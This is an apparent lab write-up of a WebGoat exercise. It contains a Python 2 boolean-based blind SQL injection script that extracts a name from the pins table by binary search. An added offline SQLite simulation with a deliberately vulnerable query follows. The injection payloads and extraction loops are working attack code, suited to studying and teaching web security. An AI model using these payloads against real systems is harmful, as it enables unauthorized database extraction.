Trying this task by hand would be rather tedious, so I decided to solve it with a program.
Python is convenient for problems like this, so I spent some time getting started with Python and then wrote the code. The principle is very simple.
Along the way I discovered that I had forgotten even the simple algorithms. Embarrassing.
The code follows.
#!/usr/bin/python
# author: dengzhaoqun
# date: 2013-03-08
# email: dengzhaoqun@163.com
#
# Python 2 script (urllib2, print statement). Boolean-based blind SQL
# injection against the WebGoat lesson: the page only tells us whether the
# submitted account number is "valid", so every request leaks one bit, and
# the name is recovered by binary search over LENGTH() and SUBSTRING().
import urllib
import urllib2

url = 'http://localhost/WebGoat/attack?Screen=3433&menu=1100'
account = 101
# Marker that appears in the response when the injected condition is true.
result = '<p>Account number is valid</form></div>'


def isValid(payload):
    """Submit payload as account_number; True if the page reports 'valid'."""
    params = urllib.urlencode({'account_number': payload, 'SUBMIT': 'Go!'})
    # The JSESSIONID must be copied from the logged-in browser session.
    req = urllib2.Request(url, params,
                          {'Cookie': 'JSESSIONID=8FFA3190C91029D2BB486DEBE4D037B0'})
    f = urllib2.urlopen(req)
    content = f.read()
    return content.find(result) != -1


# Step 1: binary search for the name length, i.e. the smallest n such that
# LENGTH(name) <= n. An invalid reply means the length is larger than n.
lenMax = 100
lenMin = 1
while lenMax > lenMin:
    mid = (lenMax + lenMin) / 2
    payload = ("%d and ((LENGTH(select name from pins where cc_number = "
               "'4321432143214321')) <= %d)" % (account, mid))
    if not isValid(payload):
        lenMin = mid + 1
    else:
        lenMax = mid
print "--- name len: %d ---" % lenMax

# Step 2: for each position i, binary search the character over 'A'..'z',
# i.e. the smallest c such that SUBSTRING(name, i, 1) <= c.
name = ''
for i in range(1, lenMax + 1):
    charMax = 122  # 'z'
    charMin = 65   # 'A'
    while charMax > charMin:
        char = (charMax + charMin) / 2
        payload = ("%d and ((SUBSTRING((select name from pins where cc_number = "
                   "'4321432143214321'), %d, 1)) <= '%s')" % (account, i, chr(char)))
        if not isValid(payload):
            charMin = char + 1
        else:
            charMax = char
    name += chr(charMax)
print '--- name: %s ---' % name
The output is as follows:
--- name len: 4 ---
--- name: Jill ---
"Jill" is the name we were looking for.
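To make the technique reproducible without a running WebGoat instance, the following is an added example (not the original post's script and not WebGoat code). It simulates the vulnerable account lookup with an in-memory SQLite database, where a deliberately unsafe query plays the role of the injectable account_number parameter and a true/false oracle plays the role of the "Account number is valid" page text. The extraction itself is the same boolean-based blind technique as above, generalised in two ways: the length search starts at 0, and each character is found by binary search over its code point across the whole printable ASCII range (32..126) instead of comparing quoted letters between 'A' and 'z'. The table and column names pins, name and cc_number, the card number and the account number 101 follow the post; the user_data table and its contents, the Oracle class, the helper names and the use of SQLite's unicode()/substr() functions are assumptions made for this example (other databases spell these functions differently, e.g. ASCII()/SUBSTRING()).

```python
#!/usr/bin/env python3
"""Boolean-based blind SQL injection, simulated offline.

Added example for the WebGoat write-up above; not the original script.
A constructed SQLite database stands in for the lab's back end.
"""
import sqlite3

# Subquery whose result we want to read, as in the post.
TARGET = "(select name from pins where cc_number = '4321432143214321')"


class Oracle:
    """The vulnerable lookup plus the one bit the page leaks.

    is_valid() returns True when the (deliberately unsafe) query returns
    a row, mirroring 'Account number is valid'.  It also counts requests,
    because request volume is what makes blind extraction noticeable.
    """

    def __init__(self):
        # Constructed sample data: one valid account and the target row.
        self.conn = sqlite3.connect(":memory:")
        self.conn.executescript("""
            CREATE TABLE user_data (userid INTEGER, first_name TEXT);
            INSERT INTO user_data VALUES (101, 'Joe');
            CREATE TABLE pins (cc_number TEXT, pin INTEGER, name TEXT);
            INSERT INTO pins VALUES ('4321432143214321', 4321, 'Jill');
        """)
        self.queries = 0

    def is_valid(self, account_number):
        self.queries += 1
        # Vulnerable on purpose: the parameter is concatenated into the SQL.
        sql = "SELECT first_name FROM user_data WHERE userid = " + account_number
        try:
            return self.conn.execute(sql).fetchone() is not None
        except sqlite3.Error:
            # A malformed payload produces an error page in the real lab,
            # which the attacker can only read as "not valid".
            return False


def smallest_true(lo, hi, pred):
    """Smallest x in [lo, hi] with pred(x) True, for a monotone predicate
    (False ... False True ... True).  Each iteration costs one query."""
    while lo < hi:
        mid = (lo + hi) // 2
        if pred(mid):
            hi = mid
        else:
            lo = mid + 1
    return lo


def blind_length(oracle, account, subquery, max_len=100):
    """Length of the subquery result: smallest n with LENGTH(result) <= n."""
    return smallest_true(
        0, max_len,
        lambda n: oracle.is_valid("%d and (LENGTH(%s) <= %d)" % (account, subquery, n)))


def blind_string(oracle, account, subquery, lo=32, hi=126):
    """Recover the subquery result one character at a time.

    Comparing code points instead of quoted characters sidesteps the
    database's string collation (a case-insensitive collation would make
    'a' <= 'A' true) and never puts attacker-chosen bytes inside quotes.
    """
    length = blind_length(oracle, account, subquery)
    chars = []
    for i in range(1, length + 1):
        code = smallest_true(
            lo, hi,
            lambda c: oracle.is_valid(
                "%d and (unicode(substr(%s, %d, 1)) <= %d)" % (account, subquery, i, c)))
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    oracle = Oracle()
    name = blind_string(oracle, 101, TARGET)
    print("--- name: %s --- (%d requests)" % (name, oracle.queries))
```

With a 4-character name the whole run takes at most 35 requests: about 7 for the length and about 7 per character, since each binary search over a range of roughly 100 values needs ceil(log2(100)) probes. Note that on the real target a payload with a syntax error is indistinguishable from a false condition, so a wrong guess about the database's function names silently drives every search to its upper bound (the length would come back as max_len); checking one known-true and one known-false payload before the search is the usual sanity test.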